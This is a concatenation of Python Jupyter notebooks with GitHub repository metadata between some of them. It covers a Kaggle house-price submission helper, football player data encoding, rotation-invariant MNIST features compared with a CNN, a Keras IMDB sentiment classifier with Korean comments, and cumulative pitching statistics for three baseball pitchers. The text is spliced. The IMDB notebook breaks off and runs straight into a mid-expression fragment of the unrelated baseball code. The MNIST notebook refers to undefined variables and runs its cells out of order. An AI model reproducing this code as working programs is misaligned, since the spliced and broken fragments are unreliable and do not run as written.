def create_submissions(models, meta_model, test_data):
    """Write one Kaggle submission CSV per base model plus the meta model.

    Each base model predicts log(SalePrice); predictions are exponentiated
    back to prices before export.  The stacked base-model predictions are
    also fed to ``meta_model`` for a 'MetaModel' submission file.

    Returns the (n_samples, n_models) matrix of stacked base-model
    predictions — the caller assigns this result, but the original
    implementation returned None by accident.

    NOTE(review): relies on the module-level ``submission_index`` for the
    CSV index, and writes ``<ModelName>.csv`` files in the working directory.
    """
    meta_data = np.empty((test_data.shape[0], len(models)))
    result_dict = {}
    for i, model in enumerate(models):
        # predict once per model and reuse it (the original called
        # model.predict twice per model)
        yhat_log = model.predict(test_data)
        meta_data[:, i] = yhat_log
        result_dict[type(model).__name__] = np.exp(yhat_log)
    # the original used a pointless for/else here; the meta prediction simply
    # happens after the loop completes
    result_dict['MetaModel'] = np.exp(meta_model.predict(meta_data))
    for key, value in result_dict.items():
        # presumably excluded because GaussianMixture 'predictions' are
        # cluster labels, not prices — TODO confirm
        if key != 'GaussianMixture':
            export = pd.DataFrame(value, columns=['SalePrice'])
            export.index = submission_index
            export.index.name = 'Id'
            export.to_csv(key + '.csv')
    return meta_data
# +
# Export Predictions
# Sanity-check that train/test feature dimensions line up before predicting.
assert X_train.shape[1] == X_test.shape[1] and X_test.shape[0] == df_test.shape[0]
# NOTE(review): check that create_submissions actually returns the stacked
# prediction matrix — otherwise meta_data ends up as None here.
meta_data = create_submissions(models,xgb_meta,X_test)
| 17,742 |
/jupyter/preparing_data/.ipynb_checkpoints/05 - Encode Categories-checkpoint.ipynb
|
53ff1395d717e5c00f7a65de04d6b0fc6c97fe52
|
[] |
no_license
|
richardjdury/fpl
|
https://github.com/richardjdury/fpl
| 4 | 1 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 232,800 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] toc=true
# <h1>Table of Contents<span class="tocSkip"></span></h1>
# <div class="toc"><ul class="toc-item"><li><span><a href="#Import-Packages" data-toc-modified-id="Import-Packages-1"><span class="toc-item-num">1 </span>Import Packages</a></span></li><li><span><a href="#Read-in-Data" data-toc-modified-id="Read-in-Data-2"><span class="toc-item-num">2 </span>Read in Data</a></span></li><li><span><a href="#OneHot-Position-Data" data-toc-modified-id="OneHot-Position-Data-3"><span class="toc-item-num">3 </span>OneHot Position Data</a></span></li><li><span><a href="#Binary-Encode-Team-and-opponent_team" data-toc-modified-id="Binary-Encode-Team-and-opponent_team-4"><span class="toc-item-num">4 </span>Binary Encode Team and opponent_team</a></span></li></ul></div>
# -
# ## Import Packages
# +
import numpy as np
import pandas as pd
import category_encoders as ce
import matplotlib.pyplot as plt
pd.set_option('display.max_columns', None)
# -
# ## Read in Data
# Load player performance data and encode its categorical columns.
pp = pd.read_csv('../../data/csv/player_performance_04.csv')
pp.head()
# ## OneHot Position Data
pp_position = pp.copy()
# One-hot encode the four playing positions, then rename the generated
# position_1..position_4 columns to their football meanings.
ohe = ce.one_hot.OneHotEncoder(cols=["position"])
pp_position = ohe.fit_transform(pp_position)
pp_position = pp_position.rename(columns={"position_1": "GKP", "position_2": "DEF", "position_3": "MID", "position_4": "FWD"})
pp_position[["GKP","DEF","MID","FWD"]] = pp_position[["GKP","DEF","MID","FWD"]].replace({1: True, 0: False})
pp_position.head()
# ## Binary Encode Team and opponent_team
pp_team = pp_position.copy()
# Binary (bit-pattern) encoding keeps the team columns compact compared to
# one-hot encoding every team.
lbe = ce.binary.BinaryEncoder(cols=["team", "opponent_team"])
pp_team = lbe.fit_transform(pp_team)
pp_team.head()
# Identify new columns and replace 1 and 0 with True and False
new_cols = list(set(pp_team.columns)-set(pp_position.columns))
pp_team[new_cols] = pp_team[new_cols].replace({1: True, 0: False})
pp_team.head()
pp_team.to_csv(r'../../data/csv/player_performance_05.csv',
               index=False,
               index_label=False)
| 2,286 |
/Preparation.ipynb
|
141724383a397ca574237749e2384674935b57a5
|
[] |
no_license
|
akloster/ep2015-slides
|
https://github.com/akloster/ep2015-slides
| 1 | 1 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 1,550,209 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import tensorflow as tf
from tensorflow import keras
import matplotlib.pyplot as plt
import math
import numpy as np
import itertools as it
import dill
dill.dump_session('notebook_env.db')
# MNIST: first 50k training images for training, last 10k held out.
(x_train0, y_train0), (x_test, y_test) = tf.keras.datasets.mnist.load_data()
x_train = x_train0[:50000]
y_train = y_train0[:50000]
x_hold = x_train0[50000:]
y_hold = y_train0[50000:]
y_train.shape
plt.imshow(x_train[5], cmap='Greys')
# +
# Flatten each 28x28 image into a 784-vector.
x_train_flat = np.array([x.reshape((784)) for x in x_train])
x_test_flat = np.array([x.reshape((784))for x in x_test])
x_train_flat.shape
#"Unrolled" MNIST array is numbered left to right, top to bottom., so first entry of each unrolled vector is top-left pixel
# +
def GF00(j):
    """Gaussian weight for the centre sample, evaluated at flattened pixel j.

    The image is 28x28, so pixel j sits at row floor(j/28), column j % 28;
    the Gaussian is centred between pixels at (13.5, 13.5) and is twice as
    tight along the row axis.
    """
    row = np.floor(j / 28)
    col = j % 28
    return np.exp(-2 * (row - 13.5) ** 2 - (col - 13.5) ** 2)
# Handle r=0 case specially
# +
# Build the 417x784 polar resampling matrix GF: row 0 samples the image
# centre; rows 1..416 are 13 rings of 32 Gaussian "taps" each, with ring
# width growing with radius (.02*r + .5).
GF = np.zeros((417,784))
GF[0,] = [GF00(x) for x in np.arange(784)]
for i in range(1,32*13+1):
    for j in range(784):
        r = (np.floor((i-1)/32)+1)
        t = (i-1)%32*(2*np.pi/32)
        # (u, v) = image coordinates of flattened pixel j, with u flipped so
        # that angle t is measured counter-clockwise.
        u = 27-np.floor(j/28)
        v = j%28
        GF[i,j] = np.exp((-(v-13.5-r*math.cos(t))**2-(u-13.5-r*math.sin(t))**2)/((.02*r+.5)))
# +
# Project each flattened image through GF to get its polar sampling.
x_train_rot_nonorm = np.transpose(np.matmul(GF, np.transpose(x_train_flat)))
x_test_rot_nonorm = np.transpose(np.matmul(GF, np.transpose(x_test_flat)))
x_train_rot_nonorm.shape
#Now normalize each image by dividing image values by max pixel intensity.
x_train_rot = np.transpose(np.transpose(x_train_rot_nonorm)/np.amax(x_train_rot_nonorm,axis=1))
x_test_rot = np.transpose(np.transpose(x_test_rot_nonorm)/np.amax(x_test_rot_nonorm,axis=1))
# -
#Check normalization works
print(max(x_test_rot[55]), max(x_train_rot[66]))
def rot_plot(image):
    """Scatter-plot a 417-element polar image.

    Index 0 is the centre sample; the remaining 416 values are 13 rings of
    32 points, drawn at radius 1.3*(ring+1) for visual spacing.
    """
    idx = np.arange(416)
    radii = 1.3 * (np.floor(idx / 32) + 1)
    angles = (idx % 32) * (2 * np.pi / 32)
    xs = np.concatenate(([0], radii * np.cos(angles)))
    ys = np.concatenate(([0], radii * np.sin(angles)))
    plt.figure(figsize=(10, 10))
    plt.scatter(x=xs, y=ys, c=image, cmap="Greys")
    plt.show()
x_train_rot.shape
# Visual sanity check: show one digit in the polar sampling.
print("Number is",y_train[5])
rot_plot(x_train_rot[5])
def firstdeg(x_train_rot):
    """First-degree rotation invariants: the centre pixel plus each ring's mean.

    Index 0 of the polar image is the centre sample; the following 13 blocks
    of 32 values are rings of increasing radius.  Averaging around each ring
    removes the angular (rotation) dependence, giving a length-14 vector.
    """
    ring_means = [np.mean(x_train_rot[32 * r + 1: 32 * r + 33]) for r in range(13)]
    return np.array([x_train_rot[0]] + ring_means)
# (Reminder from the original author: Python slices exclude the end index.)
def secdeg(x_train_rot):
dummy = [x_train_rot[0]**2]
#Here calculate the terms involving center point
for r in range(13):
dummy.append(np.sum(x_train_rot[0]*x_train_rot[(r*32+1):(r*32+33)])/32)
#Then, calculate everything else
for i in range(13):
for j in range(13):
for k in range(9):
if k == 0 and i<j: #don't double count these special pairs
continue
total = 0
for s in range(32):
total += x_train_rot[i*32+1+s]*x_train_rot[j*32+1+(2*k+s)%32]
dummy.append(total/32)
return(np.array(dummy))
# +
# def secdeg_mat(x_train_rot):
# dummy = [x_train_rot[:,0]**2]
# #Here calculate the terms involving center point
# for r in range(10):
# np.c_[dummy,(np.sum(np.transpose(np.transpose(x_train_rot[:,(r*32+1):(r*32+33)])*x_train_rot[:,0]),axis=1)/32)]
# #Then, calculate everything else
# for i in range(10):
# for j in range(10):
# for k in range(17):
# if k == 0 and i<j: #don't double count these special pairs
# continue
# total = 0
# for s in range(32):
# total += x_train_rot[i*32+1+s]*x_train_rot[j*32+1+(k+s)%32]
# dummy.append(total/32)
# return(np.array(dummy))
# +
# def thirdeg(x_train_rot):
# #Only calculate triangles with vertices on same radius, angles.
# #Fixing the minimal angle, there is a bijection (?):
# dummy = []
# for r in range(6):
# for i in range(1,6):
# for j in range(16):
# if j < i or j > (16 - 2*i):
# continue
# total = 0
# for s in range(32):
# total += x_train_rot[32*r+1+s]*x_train_rot[32*r+1+(2*i+s)%32]*x_train_rot[32*r+1+(2*(i+j)+s)%32]
# dummy.append(total/32)
# return(np.array(dummy))
# -
# def rot_features(x_train_rot):
# return(np.concatenate([firstdeg(x_train_rot),secdeg(x_train_rot),thirdeg(x_train_rot)]))
def rot_features(x_train_rot):
    """All rotation-invariant features for one polar image: the 14
    first-degree ring means followed by the second-degree correlations."""
    first = firstdeg(x_train_rot)
    second = secdeg(x_train_rot)
    return np.concatenate((first, second))
# Feature-vector length check: 14 first-degree + 1457 second-degree = 1471,
# matching the Dense input_shape below.
print(firstdeg(x_train_rot[0]).shape)
print(secdeg(x_train_rot[0]).shape)
#firstdeg(x_train_rot[0])
print(max(rot_features(x_train_rot[7])),max(firstdeg(x_train_rot[7])),\
      max(secdeg(x_train_rot[7])))
# Compute invariant features for the full train/test sets (slow).
x_train_features = np.array([rot_features(x) for x in x_train_rot])
x_test_features = np.array([rot_features(x) for x in x_test_rot])
x_train_features.shape
# +
# Small dense classifier on top of the invariant features.
model = keras.Sequential([
    keras.layers.Dense(200, input_shape = (1471,), activation=tf.nn.relu),
    keras.layers.Dense(10, activation=tf.nn.softmax)
])
model.compile(optimizer='adam',
              loss='sparse_categorical_crossentropy',
              metrics=['accuracy'])
#Seems to be very sensitive to initialization:
#First try, took maybe 10 runs of 5 epochs to get .83
#Second try, got stuck at local minima with .5 accuracy
#Third try, first run got one a good path, achieved .9 accuracy by epoch 15
#After normazliation, optimization seems to run muuch smoother, e very run so far gets to above .9 accuracy
# -
model.fit(x_train_features, y_train, verbose=1, epochs=15)
model.evaluate(x_test_features, y_test)
#Looking at predictions made by trained model
predictions1 = np.argmax(model.predict(x_test_features),axis=1)
predictions = np.column_stack((predictions1,y_test))
print(predictions[1:10,])
# +
# #Now, we look at a model that considers up to second order features:
# x_train_secorder = x_train_features[:,0:611]
# x_test_secorder = x_test_features[:,0:611]
# model_secorder = keras.Sequential([
# keras.layers.Dense(200, input_shape = (611,), activation=tf.nn.relu),
# keras.layers.Dense(10, activation=tf.nn.softmax)
# ])
# model_secorder.compile(optimizer='adam',
# loss='sparse_categorical_crossentropy',
# metrics=['accuracy'])
# model_secorder.fit(x_train_secorder, y_train, epochs=30)
# +
# model_secorder.evaluate(x_test_secorder, y_test)
# +
#Now want to show features are invariant under rotation (technically by 2pi/32)
#Creating the rotation matrix
# PermBlock cyclically shifts the 32 samples of one ring by one step.
PermBlock = np.empty((32,32))
for i in range(32):
    for j in range(32):
        if (i+1)%32 == j:
            PermBlock[i,j] = 1
        else:
            PermBlock[i,j] = 0
# Block-diagonal copy of PermBlock for all 13 rings, plus an extra first
# row/column that leaves the centre sample (index 0) fixed.
PermMat1 = np.kron(np.eye(13),PermBlock)
PermMat2 = np.vstack((np.zeros((1,13*32)),PermMat1))
PermMat_FirstCol = np.zeros((13*32+1,1))
PermMat_FirstCol[0] = 1
PermMat = np.hstack((PermMat_FirstCol,PermMat2))
print(PermMat.shape)
PermMat
# -
#Show that features are invariant under rotation by 2*pi/32. Will do it on test set, since calculating features is long.
#As this generates group, features invariant under entire action
test_rotdiff = np.array([rot_features(x) for x in np.transpose(np.matmul(PermMat,np.transpose(x_test_rot)))])
np.amax(np.abs(x_test_features-test_rotdiff))
# +
#Confirm for an even more extreme rotation of 13*2*pi/32.
x_test_rot100 = np.transpose(np.matmul(np.linalg.matrix_power(PermMat,13),np.transpose(x_test_rot[:100])))
test_rotdiff100 = np.array([rot_features(x) for x in x_test_rot100])
np.amax(np.abs(x_test_features[:100]-test_rotdiff100))
# +
#Now want to train a CNN:
#First, prepare the data for CNN
# Reshape to (N, 28, 28, 1) channel-last tensors and scale pixels to [0, 1].
x_test_CNN = x_test.reshape(10000,28,28,1)
x_train_CNN = x_train.reshape(50000,28,28,1)
x_hold_CNN = x_hold.reshape(10000,28,28,1)
x_test_CNN = x_test_CNN.astype('float32')
x_train_CNN = x_train_CNN.astype('float32')
# NOTE(review): x_hold_CNN is never cast to float32, so the division below
# promotes it to float64 — harmless but inconsistent with train/test.
x_test_CNN = x_test_CNN/255
x_train_CNN = x_train_CNN/255
x_hold_CNN = x_hold_CNN/255
# -
x_train_CNN.shape
from keras.models import Sequential
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.optimizers import Adam
from keras.layers.normalization import BatchNormalization
from keras.utils import np_utils
from keras.layers import Conv2D, MaxPooling2D, ZeroPadding2D, GlobalAveragePooling2D
from keras.layers.advanced_activations import LeakyReLU
# +
# Three steps to create a CNN
# 1. Convolution
# 2. Activation
# 3. Pooling
# Repeat Steps 1,2,3 for adding more hidden layers
# 4. After that make a fully connected network
# This fully connected network gives ability to the CNN
# to classify the samples
# Baseline CNN for comparison against the invariant-feature model:
# two conv blocks (32 then 64 filters, each Conv-BN-ReLU twice + max-pool)
# followed by a dense head.
model_CNN = Sequential()
model_CNN.add(Conv2D(32, (3, 3), input_shape=(28,28,1)))
model_CNN.add(BatchNormalization(axis=-1))
model_CNN.add(Activation('relu'))
model_CNN.add(Conv2D(32, (3, 3)))
model_CNN.add(BatchNormalization(axis=-1))
model_CNN.add(Activation('relu'))
model_CNN.add(MaxPooling2D(pool_size=(2,2)))
model_CNN.add(Conv2D(64,(3, 3)))
model_CNN.add(BatchNormalization(axis=-1))
model_CNN.add(Activation('relu'))
model_CNN.add(Conv2D(64, (3, 3)))
model_CNN.add(BatchNormalization(axis=-1))
model_CNN.add(Activation('relu'))
model_CNN.add(MaxPooling2D(pool_size=(2,2)))
model_CNN.add(Flatten())
# Fully connected layer
model_CNN.add(Dense(512))
model_CNN.add(BatchNormalization())
model_CNN.add(Activation('relu'))
model_CNN.add(Dropout(0.2))
model_CNN.add(Dense(10))
model_CNN.add(Activation('softmax'))
model_CNN.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
# -
model_CNN.fit(x_train_CNN, y_train, epochs=5)
model_CNN.evaluate(x_test_CNN, y_test)
# +
#Now, we'll evaluate all models so far on rotated test set
#Generate rotated dataset first:
# Randomly rotate each held-out image by up to +/-90 degrees.
x_hold_rotCNN = []
for i in range(10000):
    x_hold_rotCNN.append((tf.contrib.keras.preprocessing.image.random_rotation(x_hold_CNN[i], rg = 90, row_axis=0, col_axis=1, channel_axis=2)))
x_hold_rotCNN = np.array(x_hold_rotCNN)
# -
import cv2
x_test.shape
# Rotate one sample by 67 degrees with OpenCV and view it in polar sampling.
M = cv2.getRotationMatrix2D((28 / 2, 28 / 2), 67, 1)
res = cv2.warpAffine(x_hold[100], M, (28, 28))
res = np.matmul(GF,res.reshape(784))
res = res/np.amax(res)
rot_plot(res)
#Generate features
# Flatten the randomly rotated hold-out images, project them through the
# polar filter bank GF, normalise, and compute the invariant features.
x_hold_rot_raw = x_hold_rotCNN.reshape(10000,28,28)
x_hold_rot_raw = np.array([x.reshape((784))for x in x_hold_rot_raw])
x_hold_rot_raw = np.transpose(np.matmul(GF, np.transpose(x_hold_rot_raw)))
x_hold_rot_raw = np.transpose(np.transpose(x_hold_rot_raw)/np.amax(x_hold_rot_raw,axis=1))
x_hold_rot_features = np.array([rot_features(x) for x in x_hold_rot_raw])
x_hold_rotCNN.shape
def diffrot(i):
    """Max elementwise difference between the invariant features of the i-th
    rotated test image and the i-th original polar test image (should be
    near 0 if the features are truly rotation-invariant).

    NOTE(review): ``x_test_rotated_raw`` is not defined anywhere in this
    notebook as shown — presumably a stale name from an earlier session
    (cf. ``x_hold_rot_raw``); confirm before rerunning.
    """
    return(np.amax(rot_features(x_test_rotated_raw[i])-rot_features(x_test_rot[i])))
diffrot(400)
# Compare the randomly-rotated hold-out digit against its unrotated version.
print(y_hold[100])
rot_plot(x_hold_rot_raw[100])
print("Number is ",y_test[100])
rot_plot(np.matmul(np.linalg.matrix_power(PermMat,13),x_hold_rot_raw[100]))
# NOTE(review): x_hold_rotTest is used here but only defined a few lines
# below — the notebook cells were evidently executed out of order.
print("Number is ",y_test[100])
rot_plot(x_hold_rotTest[100])
# Polar features for the *unrotated* hold-out set, for comparison.
x_hold_rotTest = np.array([x.reshape((784))for x in x_hold])
x_hold_rotTest = np.transpose(np.matmul(GF, np.transpose(x_hold_rotTest)))
x_hold_rotTest = np.transpose(np.transpose(x_hold_rotTest)/np.amax(x_hold_rotTest,axis=1))
# +
#So rotated and original image give the same
print(np.amax(rot_features(np.matmul(np.linalg.matrix_power(PermMat,13),x_hold_rot_raw[100])) - rot_features(x_hold_rot_raw[100])))
#Now lets compare to original
print(np.amax(rot_features(x_hold_rot_raw[100])-rot_features(x_hold_rotTest[100])))
#Now compare cv rotated
print(np.amax(rot_features(x_hold_rot_raw[100])-rot_features(res)))
# -
# NOTE(review): neither model_tanh nor x_test_rotated_features is defined in
# this notebook as shown — this evaluation cell appears stale.
model_tanh.evaluate(x_test_rotated_features,y_test)
print("InvarFeatures, Full: ",model.evaluate(x_hold_rot_features, y_hold))
#print("CNN: ",model_CNN.evaluate(x_hold_rotCNN, y_h
| 12,288 |
/케라스 이진분류 알아보기.ipynb
|
dade2e7b54701c501a5e235ca1a300f970d1acf0
|
[] |
no_license
|
zerosum99/keras
|
https://github.com/zerosum99/keras
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 65,865 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
from keras.datasets import imdb
# ## 피클을 처리하려면 예외가 발생하므로
#
# - 넘파이 load 모듈을 변경해서 처리
import numpy as np
# +
# save np.load
np_load_old = np.load
# modify the default parameters of np.load
# Older imdb.load_data caches pickled arrays; NumPy >= 1.16.3 defaults to
# allow_pickle=False, so temporarily patch np.load to permit pickles.
np.load = lambda *a,**k: np_load_old(*a, allow_pickle=True, **k)
# -
(train_data, train_labels), (test_data, test_labels) = imdb.load_data(num_words=10000)
# restore np.load for future normal usage
np.load = np_load_old
# ## Negative is 0, positive is 1
# ### Positive and negative each make up 50% of the data
train_labels.sum()
(train_labels < 1).sum()
train_labels.shape
train_data.shape
max(train_data.max())
# ## Converting back into words
word_index = imdb.get_word_index()
# ### Every element inside the training data is a list (of word indices)
train_data.shape
train_data
train_data[0]
type(word_index)
reverse_word_index = dict([(value, key) for (key, value) in word_index.items()])
reverse_word_index[9995]
# Indices 0-2 are reserved (padding / start / unknown), hence the i - 3.
decoded_review = " ".join([reverse_word_index.get(i - 3, '?') for i in train_data[0]])
decoded_review
# ## 학습 및 데스트 데이터에 대한 다차원 배열로 변형
def vectorize_sequence(sequences, dimension=10000):
    """Multi-hot encode integer index sequences.

    Returns a float matrix of shape (len(sequences), dimension) where
    row r has 1.0 at every index that appears in sequences[r].
    """
    encoded = np.zeros((len(sequences), dimension))
    for row, indices in enumerate(sequences):
        encoded[row, indices] = 1
    return encoded
# Multi-hot encode the reviews and cast labels to float32 for the network.
x_train = vectorize_sequence(train_data)
x_test = vectorize_sequence(test_data)
x_train[0]
x_train.shape
x_test.shape
y_train = np.asarray(train_labels).astype('float32')
y_test = np.asarray(test_labels).astype('float32')
# ## Defining the model
from keras import models
from keras import layers
# ### Creating the model object
type(models.Sequential)
model = models.Sequential()
# ### Adding layers to the model
type(layers.Dense)
model.add(layers.Dense(16, activation='relu', input_shape=(10000,)))
model.add(layers.Dense(16, activation='relu'))
# Single sigmoid output: probability that the review is positive.
model.add(layers.Dense(1, activation='sigmoid'))
# ## Compiling the model
model.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['accuracy'])
# ## Creating validation data
x_val = x_train[ : 10000]
partial_x_train = x_train[10000:]
y_val = y_train[:10000]
partial_y_train = y_train[10000:]
# ## Training the model
history = model.fit(partial_x_train, partial_y_train, epochs=20, batch_size=512, validation_data=(x_val, y_val))
history.history.keys()
# ## Plotting training and validation loss
# %matplotlib inline
import matplotlib.pyplot as plt
history_dict = history.history
loss = history_dict['loss']
val_loss = history_dict['val_loss']
epochs = range(1, len(loss)+1)
# +
plt.plot(epochs, loss, 'bo', label='Training loss')
plt.plot(epochs, val_loss, 'b', label="Validation loss")
plt.title(' Training and Validataion loss')
plt.xlabel('epochs')
plt.ylabel(' Loss')
plt.legend()
# -
# NOTE(review): recent Keras versions record this metric under 'accuracy',
# not 'acc' — these keys may need updating depending on the Keras version.
acc = history_dict['acc']
val_acc = history_dict['val_acc']
# +
plt.plot(epochs, acc, 'bo', label='Training acc')
plt.plot(epochs, val_acc, 'b', label="Validation acc")
plt.title(' Training and Validataion acc')
plt.xlabel('epochs')
plt.ylabel(' Accuracy')
plt.legend()
# -
# ## Training again (fewer epochs, full training set)
model.fit(x_train,y_train, epochs=4, batch_size=512)
results = model.evaluate(x_test, y_test)
results
# ## Predicting
model.predict(x_test)
['rollingIP']
# opponents against
# Cumulative ("rolling") opponent batting line against Arrieta; every stat is
# season-to-date via cumsum, so each row is the value after that start.
arrieta['1B'] = arrieta.H - (arrieta['2B'] + arrieta['3B'] + arrieta['HR'])
arrieta['AVG'] = arrieta.H.cumsum() / arrieta.AB.cumsum()
arrieta['OBP'] = (arrieta.H.cumsum() + arrieta.BB.cumsum() + arrieta.HBP.cumsum()) \
    / (arrieta.AB.cumsum() + arrieta.BB.cumsum() + arrieta.HBP.cumsum() + arrieta.SF.cumsum())
arrieta['SLG'] = (arrieta['1B'].cumsum() + (arrieta['2B'].cumsum() * 2) + \
    (arrieta['3B'].cumsum() * 3) + (arrieta['HR'].cumsum() * 4)) \
    / arrieta.AB.cumsum()
arrieta['OPS'] = arrieta.OBP + arrieta.SLG
# rates
arrieta['BABIP'] = (arrieta.H.cumsum() - arrieta.HR.cumsum()) \
    / (arrieta.AB.cumsum() - arrieta.SO.cumsum() - arrieta.HR.cumsum() + arrieta.SF.cumsum())
arrieta['HR%'] = arrieta.HR.cumsum() / arrieta.BF.cumsum()
arrieta['XBH%'] = (arrieta['2B'].cumsum() + arrieta['3B'].cumsum() + arrieta['HR'].cumsum()) / arrieta.BF.cumsum()
arrieta['K%'] = arrieta['SO'].cumsum() / arrieta.BF.cumsum()
arrieta['IP%'] = (arrieta.AB.cumsum() - arrieta.SO.cumsum() - arrieta.HR.cumsum() + arrieta.SF.cumsum()) \
    / arrieta.BF.cumsum()
arrieta['GB%'] = arrieta['GB'].cumsum() \
    / (arrieta.AB.cumsum() - arrieta.SO.cumsum() - arrieta.HR.cumsum() + arrieta.SF.cumsum())
## greinke & kershaw
# The original repeated the identical column-by-column computation once per
# pitcher; compute it with a single helper instead so the three pitchers'
# stats cannot drift apart.
def _add_cumulative_stats(df):
    """Add cumulative ('rolling') season pitching stats to ``df`` in place.

    Mirrors the computation done for ``arrieta`` above: every stat is
    season-to-date via cumsum, so each row holds the value after that start.
    Expects the Baseball-Reference game-log columns IP, Rk, ER, SO, BF, H,
    AB, BB, HBP, SF, GB, 2B, 3B, HR.
    """
    # innings pitched / earned runs
    df['rollingIP'] = df.IP.cumsum()
    df['IPGame'] = df.rollingIP / df.Rk
    df['rollingER'] = df.ER.cumsum()
    df['rollingERA'] = df['rollingER'] / (df['rollingIP'] / 9.)
    # strikeout rates
    df['strikeoutsPerIP'] = df.SO.cumsum() / df['rollingIP']
    df['K/9'] = df.SO.cumsum() / (df['rollingIP'] / 9.)
    df['strikeoutsPerBF'] = df.SO.cumsum() / df.BF.cumsum()
    # hits and walks allowed
    df['hitsPerIP'] = df.H.cumsum() / df['rollingIP']
    df['hitsPerAB'] = df.H.cumsum() / df.AB.cumsum()
    df['rollingWHIP'] = (df.H.cumsum() + df.BB.cumsum()) / df['rollingIP']
    # opponents against (singles derived per game, not cumulatively)
    df['1B'] = df.H - (df['2B'] + df['3B'] + df['HR'])
    df['AVG'] = df.H.cumsum() / df.AB.cumsum()
    df['OBP'] = (df.H.cumsum() + df.BB.cumsum() + df.HBP.cumsum()) \
        / (df.AB.cumsum() + df.BB.cumsum() + df.HBP.cumsum() + df.SF.cumsum())
    df['SLG'] = (df['1B'].cumsum() + (df['2B'].cumsum() * 2) +
                 (df['3B'].cumsum() * 3) + (df['HR'].cumsum() * 4)) \
        / df.AB.cumsum()
    df['OPS'] = df.OBP + df.SLG
    # rates
    df['BABIP'] = (df.H.cumsum() - df.HR.cumsum()) \
        / (df.AB.cumsum() - df.SO.cumsum() - df.HR.cumsum() + df.SF.cumsum())
    df['HR%'] = df.HR.cumsum() / df.BF.cumsum()
    df['XBH%'] = (df['2B'].cumsum() + df['3B'].cumsum() + df['HR'].cumsum()) / df.BF.cumsum()
    df['K%'] = df['SO'].cumsum() / df.BF.cumsum()
    df['IP%'] = (df.AB.cumsum() - df.SO.cumsum() - df.HR.cumsum() + df.SF.cumsum()) \
        / df.BF.cumsum()
    df['GB%'] = df['GB'].cumsum() \
        / (df.AB.cumsum() - df.SO.cumsum() - df.HR.cumsum() + df.SF.cumsum())

for _pitcher_df in (greinke, kershaw):
    _add_cumulative_stats(_pitcher_df)
# -
# Plot each pitcher's cumulative ground-ball rate on the same axis.
ax = arrieta['GB%'].plot(label='Arrieta')
greinke['GB%'].plot(ax=ax, label='Greinke')
kershaw['GB%'].plot(ax=ax, label='Kershaw')
plt.legend(loc='best')
# ### Arrieta's Second Half
# +
# Second-half (post All-Star break) slice of Arrieta's starts, with the same
# cumulative stats recomputed from the break onwards.
# NOTE(review): DataFrame.ix is deprecated/removed in modern pandas — use
# .loc here when upgrading.
arrieta2H = arrieta.ix[allstarbreak:].copy()
arrieta2H['rollingIP'] = arrieta2H.IP.cumsum()
arrieta2H['IPGame'] = arrieta2H.rollingIP / arrieta2H.Rk
arrieta2H['rollingER'] = arrieta2H.ER.cumsum()
arrieta2H['rollingERA'] = arrieta2H['rollingER'] / (arrieta2H['rollingIP'] / 9.)
arrieta2H['strikeoutsPerIP'] = arrieta2H.SO.cumsum() / arrieta2H['rollingIP']
arrieta2H['K/9'] = arrieta2H.SO.cumsum() / (arrieta2H['rollingIP'] / 9.)
arrieta2H['strikeoutsPerBF'] = arrieta2H.SO.cumsum() / arrieta2H.BF.cumsum()
arrieta2H['hitsPerIP'] = arrieta2H.H.cumsum() / arrieta2H['rollingIP']
arrieta2H['hitsPerAB'] = arrieta2H.H.cumsum() / arrieta2H.AB.cumsum()
arrieta2H['rollingWHIP'] = (arrieta2H.H.cumsum() + arrieta2H.BB.cumsum()) / arrieta2H['rollingIP']
# opponents against
arrieta2H['1B'] = arrieta2H.H - (arrieta2H['2B'] + arrieta2H['3B'] + arrieta2H['HR'])
arrieta2H['AVG'] = arrieta2H.H.cumsum() / arrieta2H.AB.cumsum()
arrieta2H['OBP'] = (arrieta2H.H.cumsum() + arrieta2H.BB.cumsum() + arrieta2H.HBP.cumsum()) \
    / (arrieta2H.AB.cumsum() + arrieta2H.BB.cumsum() + arrieta2H.HBP.cumsum() + arrieta2H.SF.cumsum())
arrieta2H['SLG'] = (arrieta2H['1B'].cumsum() + (arrieta2H['2B'].cumsum() * 2) + \
    (arrieta2H['3B'].cumsum() * 3) + (arrieta2H['HR'].cumsum() * 4)) \
    / arrieta2H.AB.cumsum()
arrieta2H['OPS'] = arrieta2H.OBP + arrieta2H.SLG
# rates
arrieta2H['BABIP'] = (arrieta2H.H.cumsum() - arrieta2H.HR.cumsum()) \
    / (arrieta2H.AB.cumsum() - arrieta2H.SO.cumsum() - arrieta2H.HR.cumsum() + arrieta2H.SF.cumsum())
arrieta2H['HR%'] = arrieta2H.HR.cumsum() / arrieta2H.BF.cumsum()
arrieta2H['XBH%'] = (arrieta2H['2B'].cumsum() + arrieta2H['3B'].cumsum() + arrieta2H['HR'].cumsum()) / arrieta2H.BF.cumsum()
arrieta2H['K%'] = arrieta2H['SO'].cumsum() / arrieta2H.BF.cumsum()
arrieta2H['IP%'] = (arrieta2H.AB.cumsum() - arrieta2H.SO.cumsum() - arrieta2H.HR.cumsum() + arrieta2H.SF.cumsum()) \
    / arrieta2H.BF.cumsum()
# -
# ### Grid O' Stats
# +
# Grid of small multiples: one row per pitcher, one column per stat; the
# other two pitchers are overlaid in grey for comparison and a dotted
# vertical line marks the All-Star break.
PITCHERS = {'Arrieta': {'df': arrieta, 'color': ja, 'style': '-'},
            'Greinke': {'df': greinke, 'color': zg, 'style': '-'},
            'Kershaw': {'df': kershaw, 'color': kc, 'style': '--'}}
PITCHERS = OrderedDict(sorted(PITCHERS.items()))
stats = ['rollingERA', 'K/9', 'AVG', 'OBP', 'SLG', 'OPS']
row_titles = ['{}'.format(row_title) for row_title in PITCHERS.keys()]
